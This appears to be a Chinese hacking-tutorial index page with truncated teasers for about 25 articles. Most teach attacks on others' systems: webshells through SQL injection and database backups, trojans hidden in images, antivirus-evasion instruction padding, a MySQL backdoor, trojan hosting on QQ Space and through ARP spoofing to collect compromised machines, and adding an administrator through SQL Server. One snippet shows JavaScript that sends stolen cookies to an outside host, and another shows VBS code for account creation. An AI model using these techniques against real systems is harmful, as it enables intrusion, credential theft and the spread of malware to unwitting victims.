安全教程

黑客技巧：利用Log备份获取Webshell

dbowner通过注射得到一个shell应该不是什么难事情了，比较麻烦的是就算利用增量备份，仍然有很多不确定的因素，如果之前别人有过什么错误的写入信息，可能备份出来得到的还是一些不能用的500错误，如何能够提高成功率及重用性呢？如果单从调整增量备份的方式来看，尽管能...

安全教程 2022-02-17 13 0 获取备份技巧利用黑客 backup 可以数据库 XXXX database"
通过SQL注入得到WebShell的原理及步骤

一．通过SQL注入得到WEBSHELL的原理: N.E.V.E.R的方法：利用数据库备份得到WEBSHELL。创建一个表，在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来，最后再删除新建的表。分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数...

安全教程 2022-02-17 20 0 原理步骤得到注入通过 &rsquo 我们一个方法文件"
教你成为ASP木马高手

1.名称：如何制作图片ASP木马（可显示图片）建一个asp文件，内容为 找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为了运行成功，还要搜索<%和％>...

安全教程 2022-02-17 14 0 高手木马成为 &quot &lt request asp &amp 名称文件"
黑客如何破坏杀毒软件

最近有调查报告显示，知名品牌的杀毒软件对新型计算机病毒的查杀率只有20%，而漏杀率却高达80%。那么是什么原因造成这种状况的？到底是如今的病毒过于厉害，还是杀毒软件的能力有限？今天我们就通过实例来看看是什么“刺瞎”了杀毒软件的双眼。　　黑客姓名...

安全教程 2022-02-17 12 0 杀毒软件破坏如何黑客程序进行 &rdquo 处理"
任意组合指令达到免杀

注:编写花指令,可参考以下成双指令,可任意自由组合.达到免杀效果. push ebp pop ebp push eax pop eax push esp pop esp push 0 push 0 push 10 -------其中数字可以任意,注意与下面对应 push -10 nop -----------可任意在中...

安全教程 2022-02-17 11 0 达到指令组合任意 esp push 卡巴 jmp 加密 eax 入口"
教你关于AJAX的注入（图）

AJAX可以让数据在后台无声无息地进行，假如有办法让你的JS脚本与这个AJAX模块在同域内的话，那可以使用这个XSS来完成二次攻击，并且可以通过XHR对象的status属性来判断返回结果的正确与否。GET型的AJAX，直接构造URL里的参数值；POST型的AJAX，则构造好XHR对象的send方法...

安全教程 2022-02-17 14 0 注入关于 AJAX &quot 可以进行这个本地 up XHR 我们"
教你如何用ISAPI_Rewrite做IIS防盗链

“盗链”的定义是：此内容不在自己服务器上，而通过技术手段，绕过别人放广告有利益的最终页，直接在自己的有广告有利益的页面上向最终用户提供此内容。常常是一些名不见经传的小网站来盗取一些有实力的大网站的地址（比如一些音乐、图片、软件的下载地址）然后放置在自...

安全教程 2022-02-17 13 0 防盗如何网站一个图片表达式那么页面请求支持"
教你注入下载文件的代码到IE进程然后下载的文件

大家可能都用过网页木马来下真正的EXE木马吧，但是有些时候后门比较大下载的时候常常是网页暂停或是报错（CHM木马常遇到）所以写了这个程序。。。。程序还要改下才好用哈,不过只有2kb很小了。。。。编绎参数: C:masm32BIN>type ii.bat...

安全教程 2022-02-17 13 0 文件下载然后进程代码注入 invoke db &rsquo offset"
Mysql BackDoorDoor(图)

Mysql BackDoor是一款针对PHP Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、 WIN2003 MYSQL5.0.X下通过.[...

安全教程 2022-02-17 32 0 &quot 后门命令服务器 Mysql 运行函数执行系统"
浅谈文件捆绑技术方式（图）

随着恶意代码的发展越来越广泛，以及其强大的破坏性和更多样的传播方式，给人们带来更多的危害。叶子在前面的文章中已经跟大家谈过恶意代码的基本概念以及对其的研究分析流程。在本篇文章中叶子将给大家介绍一下恶意代码的传播方式之一的捆绑技术，以及常见的Winrar自解压...

安全教程 2022-02-17 37 0 方式技术文件捆绑恶意代码实现执行程序利用"
无聊的Css跨站挂马

以前看过分析家写过一篇文章，介绍跨站脚本的安全隐患，当时只是知道有这样的问题，也没有仔细阅读，目前此类问题经常在一些安全站点发布，偶刚好看到这样一篇文章，抱着知道总比不知道好的想法，翻译整理了一下，原文在偶主页的collection目录里，错误...

安全教程 2022-02-17 14 0 无聊 &quot &lt &gt code 脚本页面我们 script&gt 一个"
成为黑客的几个必备技能

黑客的精神态度是很重要的，但技术则更是重要。黑客的态度虽然是无可取代，随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变。1、黑客的精神态度是很重要的，但技术则更是重要。黑客的态度虽然是无可取代，随著新科技的发明和旧技术的取代,这些工具随时间在...

安全教程 2022-02-17 13 0 技能必备黑客成为程序 Unix 学习程序设计提供工具"
破解数据库下载漏洞

作为脚本漏洞的头号杀手锏——数据库下载漏洞，现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代，漏洞产生后随之而来的就是各种应对的招数，比如改数据库的后缀、修改数据库的名字等等。很多人以为只要这么做就可以解决问题了，但事实往往不如你...

安全教程 2022-02-17 14 0 漏洞下载数据库破解我们文件可以技术 &mdash 只要"
用Shell做DEAMON后台来控制安全访问

如何做一个后台DEAMON来控制安全访问？这就是贯穿这篇文章的中心概念。我的控制访问比较特殊，考虑到远程登陆点并非固定，所以无法设定固定IP通过SSH登陆服务器。这样N多IP会通过黑客软件试图破解您的用户名和密码（基本都是穷举，不怕一万只怕万一，因此我写了这个...

安全教程 2022-02-17 12 0 安全访问控制后台执行登陆 &#039 文件 &gt cat 脚本"
Unicode的消息介绍（图）

基本知识字节和字符的区别 Big Endian和Little Endian UCS-2和UCS-4 UTF-16和UTF-32 UTF-16 UTF-32 UTF-8 基本知识介绍Unicode之前，首先要讲解一些基础知识。虽然跟Unicode没有直接的关系，但想弄明白Unicode，没这些还真不行。字...

安全教程 2022-02-17 10 0 介绍消息字节 Endian UTF-16 字符代码表示 UTF-32"
主流与非主流提权技术大全

一：检测一下网站的服务器是否开了 3389 远程终端二：检测一下服务是否用了serv-u （还有是什么版本的）方法一：复制一个网站用 3389 登陆器连接一下（是否成功）能连接了，拿下服务器的机率，提高 30%了二：用ftp模式查下一个服务器的版本开...

安全教程 2022-02-17 15 0 主流大全技术 C:c:&quot 可以目录 system32 密码"
看黑客怎样汇编创建简单的窗口

理论： Windows 程序中，在写图形用户界面时需要调用大量的标准 Windows Gui 函数。其实这对用户和程序员来说都有好处，对于用户，面对的是同一套标准的窗口，对这些窗口的操作都是一样的，所以使用不同的应用程序时无须重新学习操作。对程序员来说，这些 Gui 源代码都...

安全教程 2022-02-17 15 0 简单窗口创建汇编怎样黑客 mov invoke eax NULL"
教你在QQ空间挂马

今天我来跟大家谈论一下关于QQ空间挂马的原理，我试了一下，成功率占80%。有好多人都问我怎么样才可以做到肉鸡成群，我想了好久，觉得QQ空间挂马可以实现这个。所以我试做了一下，竟然成功了！~~那我就想大家介绍一下QQ空间挂马的原理吧！~大家把应该怎样把木马...

安全教程 2022-02-17 12 0 空间木马 QQ 别人音乐大家成功运行这个然后地址"
教你拿站和找关键词思路（图）

目标这个站 http://www.chinaweibo.cc/upfile_Other.asp这个漏洞我刚看了看成功率10%左右吧我觉得这个数字就不低了毕竟是批量拿webshell~~~关于上传漏洞的帖子和教程论坛有好多相信大家都会了我步骤省略点第1 拿挖掘鸡挖或在谷歌上搜索 http://www....

安全教程 2022-02-17 14 0 思路关键词这个上传漏洞大家 http://www.chinaweibo.cc/upf"
爆破的一般思路与断点的设置

破顾名思义就是暴力修改程序的代码来达到破解的目的当然根据共享软件的注册方式我们可以对症下药比如说没有注册的软件有功能限制、使用次数限制、使用日期限制等我们就可以分别对待了！我们只需要解除这些限制自然就达到了破解的目的了！暴力破解的一...

安全教程 2022-02-17 19 0 设置思路一般 msvbvm60 bpx bp 限制程序我们提示"
Microsoft SQL Server SA权限最新入侵方法

在获得SA密码后，往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用，无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象，用来管理本地资源，利用它可以不依靠CMD等命令就能添加一个管理员，具体代码如下：set wsnetwork=Cre...

安全教程 2022-02-17 12 0 最新入侵方法权限 &quot exec @f sp_oamethod @ret"
用ASP脚本命令重启服务器

家知道直接使用ASP是不能够重启服务器的，这时我们需要制作一个组件来实现功能，ASP通过这个组件调用系统API，然后按照不同的重启和关机方式进行操作！下面先说COM的制作，在VB中新建一工程，当然是AceiveX dll的！ 1）先修改工程属性，在工程属性窗口...

安全教程 2022-02-17 14 0 服务器命令脚本工程 ASP 模块 atype As Function 用来"
新的挂马方式-ARP欺骗

网页挂马最难的就是传播了，小网站易入侵但是访问人数不多，收获的肉鸡也就不是很多。因此，一种新的挂马方式开始流行——局域网ARP欺骗挂马，只要局域网内一台机子中招了，它就可以在内网传播含有木马的网页，捕获的肉鸡就会成几何增长。　　局域网ARP欺骗挂马的好处...

安全教程 2022-02-17 16 0 欺骗方式木马生成局域网服务网页肉鸡我们可以"
教你破解xp系统administrator权限

作者：Awolf首发：Awolf’S Security Blog一．事情起因那天满头大汗的把哥哥的电脑拿回来了。可是回到家一进入系统要密码，问了n次，密码都是错的。（忘记了）又加上我用usb键盘，用ghost系统盘破解破解程序时键盘无法使用无法进行破解，于是就有本文。...

安全教程 2022-02-17 10 0 权限系统破解 PE 密码 Windows 原理一个简单实践"
asp+js 偷取Cookies源代码

偷取Cookie，通过以下脚本引入一个js，document.write("<script src=XX.js></script>")，然后js内容为： var code;　　　　　　　　　 var target = "http://www.xxx.net/cookie.asp?"; info=escape(document.location+"@@@"+d...

安全教程 2022-02-17 11 0 asp js Cookies"